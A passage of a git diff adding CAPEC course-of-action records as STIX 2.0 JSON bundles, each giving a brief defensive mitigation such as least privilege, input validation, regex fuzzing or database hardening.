"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9e2c42d5-5712-496e-a27a-6a1b3bea2ffa.json b/capec/course-of-action/course-of-action--9e2c42d5-5712-496e-a27a-6a1b3bea2ffa.json new file mode 100644 index 0000000000..878544d56e --- /dev/null +++ b/capec/course-of-action/course-of-action--9e2c42d5-5712-496e-a27a-6a1b3bea2ffa.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--43d4a73f-3e06-4886-9cb9-b29b3eecff2c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9e2c42d5-5712-496e-a27a-6a1b3bea2ffa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "coa-12-0", + "description": "\n Associate some ACL (in the form of a token) with an authenticated user which they provide middleware. The middleware uses this token as part of its channel/message selection for that client, or part of a discerning authorization decision for privileged channels/messages.\n The purpose is to architect the system in a way that associates proper authentication/authorization with each channel/message.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9e6a4c57-5807-4163-b637-6a4aeabc542d.json b/capec/course-of-action/course-of-action--9e6a4c57-5807-4163-b637-6a4aeabc542d.json new file mode 100644 index 0000000000..7d7c865d72 --- /dev/null +++ b/capec/course-of-action/course-of-action--9e6a4c57-5807-4163-b637-6a4aeabc542d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a17153a3-d1e7-4cad-896c-9826e93d1a71", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9e6a4c57-5807-4163-b637-6a4aeabc542d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-88-2", + "description": "All application processes should be run with the minimal privileges required. Also, processes must shed privileges as soon as they no longer require them.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9ec57b04-4c1e-4120-b886-d7fe89b4c6b5.json b/capec/course-of-action/course-of-action--9ec57b04-4c1e-4120-b886-d7fe89b4c6b5.json new file mode 100644 index 0000000000..062bf6b312 --- /dev/null +++ b/capec/course-of-action/course-of-action--9ec57b04-4c1e-4120-b886-d7fe89b4c6b5.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--01dff4ae-b780-4e5b-b1fd-c92e37dc1cc2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9ec57b04-4c1e-4120-b886-d7fe89b4c6b5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-251-0", + "description": "Implementation: Avoid passing user input to filesystem or framework API. If necessary to do so, implement specific, white-list approach.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9f1dd4d3-79f3-4779-9527-c667989b9ceb.json b/capec/course-of-action/course-of-action--9f1dd4d3-79f3-4779-9527-c667989b9ceb.json new file mode 100644 index 0000000000..8d3938d437 --- /dev/null +++ b/capec/course-of-action/course-of-action--9f1dd4d3-79f3-4779-9527-c667989b9ceb.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ee138312-9f05-4e24-9e57-3eff81dd37ba", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9f1dd4d3-79f3-4779-9527-c667989b9ceb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-568-0", + "description": "Strong physical security can help reduce the ability of an adversary to install a keylogger.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--9fdce089-87f5-4f2f-b6a2-76e0615286c4.json b/capec/course-of-action/course-of-action--9fdce089-87f5-4f2f-b6a2-76e0615286c4.json new file mode 100644 index 0000000000..7a7a2ac9cf --- /dev/null +++ b/capec/course-of-action/course-of-action--9fdce089-87f5-4f2f-b6a2-76e0615286c4.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--06aab50b-64d2-4e7a-aafe-7f65589dca5d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--9fdce089-87f5-4f2f-b6a2-76e0615286c4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-62-1", + "description": "Although less reliable, the use of the optional HTTP Referrer header can also be used to determine whether an incoming request was actually one that the user is authorized for, in the current context.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a039914e-d5b9-46c7-98fa-57d0c714c8e5.json b/capec/course-of-action/course-of-action--a039914e-d5b9-46c7-98fa-57d0c714c8e5.json new file mode 100644 index 0000000000..34f51c5843 --- /dev/null +++ b/capec/course-of-action/course-of-action--a039914e-d5b9-46c7-98fa-57d0c714c8e5.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--62dd4448-11e2-4e47-9447-0519e7b03c5a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a039914e-d5b9-46c7-98fa-57d0c714c8e5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-120-1", + "description": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a0902427-2b6d-45a5-b6a3-a99eaf8d16c0.json b/capec/course-of-action/course-of-action--a0902427-2b6d-45a5-b6a3-a99eaf8d16c0.json new file mode 100644 index 0000000000..920d898400 --- /dev/null +++ b/capec/course-of-action/course-of-action--a0902427-2b6d-45a5-b6a3-a99eaf8d16c0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c363ea6c-b2ef-4cfe-ae4c-926c59a57aa9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a0902427-2b6d-45a5-b6a3-a99eaf8d16c0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-622-0", + "description": "Utilize side-channel resistant implementations of all crypto algorithms.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a0e116b6-ef9d-4fc2-9668-ee7c94b249fe.json b/capec/course-of-action/course-of-action--a0e116b6-ef9d-4fc2-9668-ee7c94b249fe.json new file mode 100644 index 0000000000..3e6e338c0c --- /dev/null +++ b/capec/course-of-action/course-of-action--a0e116b6-ef9d-4fc2-9668-ee7c94b249fe.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--43ba224b-0cd6-4155-a73f-decbf0badee8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a0e116b6-ef9d-4fc2-9668-ee7c94b249fe", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-100-5", + "description": "Utilize static source code analysis tools to identify potential buffer overflow weaknesses in the software.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a0e7a602-41ad-4d2b-91ab-2d7d76608c7b.json b/capec/course-of-action/course-of-action--a0e7a602-41ad-4d2b-91ab-2d7d76608c7b.json new file mode 100644 index 0000000000..b1860363a2 --- /dev/null +++ b/capec/course-of-action/course-of-action--a0e7a602-41ad-4d2b-91ab-2d7d76608c7b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7dd43259-5ac0-4de4-a8c6-c92927edc2e8", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a0e7a602-41ad-4d2b-91ab-2d7d76608c7b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-612-0", + "description": "Automatic randomization of WiFi MAC addresses", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a15169a5-13e5-4222-aef0-2452e9fe0921.json b/capec/course-of-action/course-of-action--a15169a5-13e5-4222-aef0-2452e9fe0921.json new file mode 100644 index 0000000000..25cf973fa8 --- /dev/null +++ b/capec/course-of-action/course-of-action--a15169a5-13e5-4222-aef0-2452e9fe0921.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f49b46fd-c525-48f7-8407-b6a1ebffecf9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a15169a5-13e5-4222-aef0-2452e9fe0921", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-93-1", + "description": "Do not allow tainted data to be written in the log file without prior input validation. Whitelisting may be used to properly validate the data.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a1a8a1e0-e04c-40c8-a0a5-572ffa3ae566.json b/capec/course-of-action/course-of-action--a1a8a1e0-e04c-40c8-a0a5-572ffa3ae566.json new file mode 100644 index 0000000000..75599862b6 --- /dev/null +++ b/capec/course-of-action/course-of-action--a1a8a1e0-e04c-40c8-a0a5-572ffa3ae566.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0c96200d-3811-4818-9e37-c36672651203", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a1a8a1e0-e04c-40c8-a0a5-572ffa3ae566", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-18-0", + "description": "In addition to the traditional input fields, all other user controllable inputs, such as image tags within messages or the likes, must also be subjected to input validation. Such validation should ensure that content that can be potentially interpreted as script by the browser is appropriately filtered.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a1b82c7b-b51e-41f7-97a0-2b5aca93652a.json b/capec/course-of-action/course-of-action--a1b82c7b-b51e-41f7-97a0-2b5aca93652a.json new file mode 100644 index 0000000000..585c8bc514 --- /dev/null +++ b/capec/course-of-action/course-of-action--a1b82c7b-b51e-41f7-97a0-2b5aca93652a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7423fe02-70d0-4050-b903-c8e90a692b3c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a1b82c7b-b51e-41f7-97a0-2b5aca93652a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-492-0", + "description": "Test custom written Regex with fuzzing to determine if the Regex is a poor one. Add timeouts to processes that handle the Regex logic. If an evil Regex is found rewrite it as a good Regex.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a2252944-e402-49b9-aedf-9c19aea7d0af.json b/capec/course-of-action/course-of-action--a2252944-e402-49b9-aedf-9c19aea7d0af.json new file mode 100644 index 0000000000..2e6aee1a47 --- /dev/null +++ b/capec/course-of-action/course-of-action--a2252944-e402-49b9-aedf-9c19aea7d0af.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2d77b6a1-1860-465a-a9d3-26c3c7adca06", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a2252944-e402-49b9-aedf-9c19aea7d0af", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-612-1", + "description": "Frequent changing of handset and retransmission device", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a25af9dc-416e-42de-910b-f3f20a06a348.json b/capec/course-of-action/course-of-action--a25af9dc-416e-42de-910b-f3f20a06a348.json new file mode 100644 index 0000000000..7f183a0a13 --- /dev/null +++ b/capec/course-of-action/course-of-action--a25af9dc-416e-42de-910b-f3f20a06a348.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7dbe225f-162b-410d-bdbc-9e4926f05d04", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a25af9dc-416e-42de-910b-f3f20a06a348", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-31-0", + "description": "Design: Use input validation for cookies", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a2cb27dd-e45c-4bc5-8d3c-eab87b6bb56a.json b/capec/course-of-action/course-of-action--a2cb27dd-e45c-4bc5-8d3c-eab87b6bb56a.json new file mode 100644 index 0000000000..06be4ec185 --- /dev/null +++ b/capec/course-of-action/course-of-action--a2cb27dd-e45c-4bc5-8d3c-eab87b6bb56a.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--94df32ad-e2cf-4aa0-bc5d-930b06191761", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a2cb27dd-e45c-4bc5-8d3c-eab87b6bb56a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-549-1", + "description": "Implement system antivirus software that scans all attachments before opening them.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a354d4f8-11d2-4af7-9657-f6898cc14b56.json b/capec/course-of-action/course-of-action--a354d4f8-11d2-4af7-9657-f6898cc14b56.json new file mode 100644 index 0000000000..b40430bac4 --- /dev/null +++ b/capec/course-of-action/course-of-action--a354d4f8-11d2-4af7-9657-f6898cc14b56.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3f7fdbd3-53c1-41d1-94e6-5ba3b55e6351", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a354d4f8-11d2-4af7-9657-f6898cc14b56", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-80-3", + "description": "Look for overlong UTF-8 sequences starting with malicious pattern. You can also use a UTF-8 decoder stress test to test your UTF-8 parser (See Markus Kuhn's UTF-8 and Unicode FAQ in reference section)", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a3bd34c7-7eee-4601-bb54-62a984114e0d.json b/capec/course-of-action/course-of-action--a3bd34c7-7eee-4601-bb54-62a984114e0d.json new file mode 100644 index 0000000000..c93da12f59 --- /dev/null +++ b/capec/course-of-action/course-of-action--a3bd34c7-7eee-4601-bb54-62a984114e0d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d73e5654-e61a-46eb-aa6a-0740c6dce73a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a3bd34c7-7eee-4601-bb54-62a984114e0d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-170-6", + "description": "Implementation: Appropriately deal with error messages.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a4eeff40-80b8-46a1-a647-8b02f513e65f.json b/capec/course-of-action/course-of-action--a4eeff40-80b8-46a1-a647-8b02f513e65f.json new file mode 100644 index 0000000000..c398ae7137 --- /dev/null +++ b/capec/course-of-action/course-of-action--a4eeff40-80b8-46a1-a647-8b02f513e65f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--510929f1-deee-4c8f-a74d-6dc5a342e1ef", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a4eeff40-80b8-46a1-a647-8b02f513e65f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-09-30T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-497-0", + "description": "Leverage file protection mechanisms to render these files accessible only to authorized parties.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a52e5a22-834c-49bb-a48c-8ad9bce272be.json b/capec/course-of-action/course-of-action--a52e5a22-834c-49bb-a48c-8ad9bce272be.json new file mode 100644 index 0000000000..7381e4c17f --- /dev/null +++ b/capec/course-of-action/course-of-action--a52e5a22-834c-49bb-a48c-8ad9bce272be.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c179374a-c8fb-4a5a-a90c-d668f747ccf3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a52e5a22-834c-49bb-a48c-8ad9bce272be", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-36-0", + "description": "Authenticating both services and their discovery, and protecting that authentication mechanism simply fixes the bulk of this problem. Protecting the authentication involves the standard means, including: 1) protecting the channel over which authentication occurs, 2) preventing the theft, forgery, or prediction of authentication credentials or the resultant tokens, or 3) subversion of password reset and the like.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a53c5e79-8db2-4393-b2e7-ea807fdde618.json b/capec/course-of-action/course-of-action--a53c5e79-8db2-4393-b2e7-ea807fdde618.json new file mode 100644 index 0000000000..c7635ab5a1 --- /dev/null +++ b/capec/course-of-action/course-of-action--a53c5e79-8db2-4393-b2e7-ea807fdde618.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--59bd195a-dff5-4d42-a856-af5abe1bade9", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a53c5e79-8db2-4393-b2e7-ea807fdde618", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-651-1", + "description": "Implement proper software restriction policies to only allow authorized software on your environment. Use of anti-virus and other security monitoring and detecting tools can aid in this too. Closely monitor installed software for unusual behavior or activity, and implement patches as soon as they become available.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a584f684-db15-4faa-94d2-5a729f32f979.json b/capec/course-of-action/course-of-action--a584f684-db15-4faa-94d2-5a729f32f979.json new file mode 100644 index 0000000000..65d58c36e4 --- /dev/null +++ b/capec/course-of-action/course-of-action--a584f684-db15-4faa-94d2-5a729f32f979.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--fd861af3-3d1a-42b0-8248-e24b8194aacb", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a584f684-db15-4faa-94d2-5a729f32f979", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-552-0", + "description": "Prevent adversary access to privileged accounts necessary to install rootkits.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a61b1090-6bb5-4c3c-9573-0f3734bd39bb.json b/capec/course-of-action/course-of-action--a61b1090-6bb5-4c3c-9573-0f3734bd39bb.json new file mode 100644 index 0000000000..066f10c2b0 --- /dev/null +++ b/capec/course-of-action/course-of-action--a61b1090-6bb5-4c3c-9573-0f3734bd39bb.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--dec65ec6-4c03-41e3-b131-b1de9131cc63", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a61b1090-6bb5-4c3c-9573-0f3734bd39bb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-104-3", + "description": "Limit the sites that are being added to the local machine zone and restrict the privileges of the code running in that zone to the bare minimum", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a6775324-11a4-4066-80ff-bc354993450c.json b/capec/course-of-action/course-of-action--a6775324-11a4-4066-80ff-bc354993450c.json new file mode 100644 index 0000000000..c84ca3ed1c --- /dev/null +++ b/capec/course-of-action/course-of-action--a6775324-11a4-4066-80ff-bc354993450c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8896addc-58ee-44db-90fe-19077cde3489", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a6775324-11a4-4066-80ff-bc354993450c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-443-0", + "description": "Assess software during development and prior to deployment to ensure that it functions as intended and without any malicious functionality.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a6a40b92-0d71-46c2-81d6-d45cd61f5c59.json b/capec/course-of-action/course-of-action--a6a40b92-0d71-46c2-81d6-d45cd61f5c59.json new file mode 100644 index 0000000000..a6946d2975 --- /dev/null +++ b/capec/course-of-action/course-of-action--a6a40b92-0d71-46c2-81d6-d45cd61f5c59.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--2d2177db-54f7-450c-be0f-29aedcd7b634", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a6a40b92-0d71-46c2-81d6-d45cd61f5c59", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-39-1", + "description": "Make sure to protect client side authentication tokens for confidentiality (encryption) and integrity (signed hash)", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a6c13cf6-959b-44ed-913f-7c10efe1c648.json b/capec/course-of-action/course-of-action--a6c13cf6-959b-44ed-913f-7c10efe1c648.json new file mode 100644 index 0000000000..371e4f3459 --- /dev/null +++ b/capec/course-of-action/course-of-action--a6c13cf6-959b-44ed-913f-7c10efe1c648.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ba43eb5f-b250-45c3-8d84-b8e591f2804b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a6c13cf6-959b-44ed-913f-7c10efe1c648", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-504-0", + "description": "The only known mitigation to this attack is to avoid installing the malicious application on the device. However, the malicious application does need the GET_TASKS permission to be able to query the task list, and being suspicious of applications with that permission can help.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a6ff025b-4369-43cd-bbef-ce942294d4c2.json b/capec/course-of-action/course-of-action--a6ff025b-4369-43cd-bbef-ce942294d4c2.json new file mode 100644 index 0000000000..1a6f78ecd0 --- /dev/null +++ b/capec/course-of-action/course-of-action--a6ff025b-4369-43cd-bbef-ce942294d4c2.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7895b22e-578a-4f61-a5c4-687751b1755d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a6ff025b-4369-43cd-bbef-ce942294d4c2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-470-0", + "description": "\n Design: Follow the defensive programming practices needed to protect an application accessing the database from SQL injection\n Configuration: Ensure that the DBMS is patched with the latest security patches\n Design: Ensure that the DBMS login used by the application has the lowest possible level of privileges in the DBMS\n Design: Ensure that DBMS runs with the lowest possible level of privileges on the host machine and that it runs as a separate user\n Usage: Do not use the DBMS machine for anything else other than the database\n Usage: Do not place any trust in the database host on the internal network. Authenticate and validate all network activity originating from the database host.\n Usage: Use an intrusion detection system to monitor network connections and logs on the database host.\n Implementation: Remove / disable all unneeded / unused functions of the DBMS system that may allow an attacker to elevate privileges if compromised\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a74c5c6a-568e-4159-aeb5-0c69bdad41ce.json b/capec/course-of-action/course-of-action--a74c5c6a-568e-4159-aeb5-0c69bdad41ce.json new file mode 100644 index 0000000000..159de1e526 --- /dev/null +++ b/capec/course-of-action/course-of-action--a74c5c6a-568e-4159-aeb5-0c69bdad41ce.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0a4467bf-b37e-4b3a-a560-52ad5aeeb215", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a74c5c6a-568e-4159-aeb5-0c69bdad41ce", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-24-0", + "description": "Make sure that ANY failure occurring in the filtering or input validation routine is properly handled and that offending input is NOT allowed to go through. Basically make sure that the vault is closed when failure occurs.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a785e881-67df-42d6-93ba-1febf606948b.json b/capec/course-of-action/course-of-action--a785e881-67df-42d6-93ba-1febf606948b.json new file mode 100644 index 0000000000..f94bb3a191 --- /dev/null +++ b/capec/course-of-action/course-of-action--a785e881-67df-42d6-93ba-1febf606948b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c8caaee3-0afe-4383-8e2d-89acc02ee86c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--a785e881-67df-42d6-93ba-1febf606948b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-592-2", + "description": "Ensure that all user-supplied input is validated before being stored.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5.json 